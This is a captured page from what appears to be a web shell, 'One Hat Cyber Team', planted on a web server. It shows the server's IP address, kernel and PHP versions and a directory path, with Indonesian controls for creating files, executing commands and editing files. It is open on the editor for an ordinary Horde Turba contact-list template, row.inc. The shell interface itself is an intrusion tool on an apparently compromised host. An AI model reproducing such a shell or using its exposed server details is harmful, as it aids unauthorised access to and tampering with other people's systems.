⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
turba
/
templates
/
browse
/
Edit File: row.inc
<?php if ($ob->hasValue('name')) { $link_text = htmlspecialchars(Turba::formatName($ob)); } elseif (isset($ob->driver->alternativeName) && !in_array($ob->driver->alternativeName, $this->columns) && $ob->hasValue($ob->driver->alternativeName)) { $link_text = htmlspecialchars($ob->getValue($ob->driver->alternativeName)); } else { $link_text = '<em>' . _("Blank name") . '</em>'; } if ($own_source == $ob->getSource() && $own_id == $ob->getValue('__key')) { $own_icon = Horde_Themes_Image::tag('user.png', array( 'alt' => _("Your own contact"), 'attr' => array('title' => _("Your own contact")) )); } else { $own_icon = ' '; } $edit_url = $vcard_url = ' '; if ($ob->hasValue('__key')) { if (!$ob->isGroup()) { $vcard_url = Horde::link(Horde::url('vcard.php')->add(array( 'source' => $ob->getSource(), 'key' => $ob->getValue('__key') ), _("Download vCard"))) . '<span class="iconImg vcardImg"></span></a>'; } $cell = Horde::link($ob->url()) . $link_text . '</a>'; if ($ob->hasPermission(Horde_Perms::EDIT)) { $edit_url = Horde::link(Horde::url('edit.php')->add(array( 'key' => $ob->getValue('__key'), 'source' => $ob->getSource(), 'url' => Horde::signUrl(Horde::selfUrl(true, false, true)) ), _("Edit"))) . '<span class="iconImg editImg"></span></a>'; } } else { $cell = $link_text; } ?> <tr> <?php if ($this->showMark): ?> <td class="turba-browse-icon"><label for="<?php echo htmlspecialchars($ob->getSource() . ':' . $ob->getValue('__key')) ?>" class="hidden"><?php echo _("Select contact") ?></label><input type="checkbox" class="checkbox" name="objectkeys[]" id="<?php echo htmlspecialchars($ob->getSource() . ':' . $ob->getValue('__key')) ?>" value="<?php echo htmlspecialchars($ob->getSource() . ':' . $ob->getValue('__key')) ?>" /></td> <?php endif; ?> <?php if ($this->showEdit): ?> <td class="turba-browse-icon"><?php echo $edit_url ?></td> <?php endif; ?> <?php if ($this->showVcard): ?> <td class="turba-browse-icon"><?php echo $vcard_url ?></td> <?php endif; ?> <?php if ($this->showGroup): ?> <td class="turba-browse-icon"><?php echo $ob->isGroup() ? '<span class="iconImg groupImg" title="' . htmlspecialchars(_("Contact List")) . '"></span>' : $own_icon ?></td> <?php endif; ?> <td<?php if ($this->showSort && $this->isSortColumn(0)) echo ' class="linedRowSelectedCol"' ?>><?php echo $cell; // We purposefully do this before the </td> so that if we end up including a // script file (say, for the IMP compose window), it's in a legal spot. // // Build the columns to display. $shown_columns = array(); for ($c = 1; $c <= count($this->columns); $c++) { $type = $GLOBALS['attributes'][$this->columns[$c - 1]]['type']; $params = isset($GLOBALS['attributes'][$this->columns[$c - 1]]['params']) ? $GLOBALS['attributes'][$this->columns[$c - 1]]['params'] : array(); if (!isset($this->variables[$this->columns[$c - 1]])) { if ($type == 'email') { $this->variables[$this->columns[$c - 1]] = new Horde_Form_Variable('', $this->columns[$c - 1], Horde_Form::getType('html'), false); } else { $this->variables[$this->columns[$c - 1]] = new Horde_Form_Variable('', $this->columns[$c - 1], Horde_Form::getType($type, $params), false); } } if ($ob->hasValue($this->columns[$c - 1])) { $value = $ob->getValue($this->columns[$c - 1]); if ($type == 'email') { $value = Turba::formatEmailAddresses($value, $ob->getValue('name')); } $this->vars->set($this->columns[$c - 1], $value); $shown_columns[$c] = $this->renderer->render( $this->form, $this->variables[$this->columns[$c - 1]], $this->vars); } else { $shown_columns[$c] = ' '; } } echo '</td>'; foreach ($shown_columns as $column => $value) { echo '<td'; if ($this->showSort && $this->isSortColumn($column)) { echo ' class="linedRowSelectedCol"'; } echo '>' . $value . '</td>'; } ?> </tr>
Simpan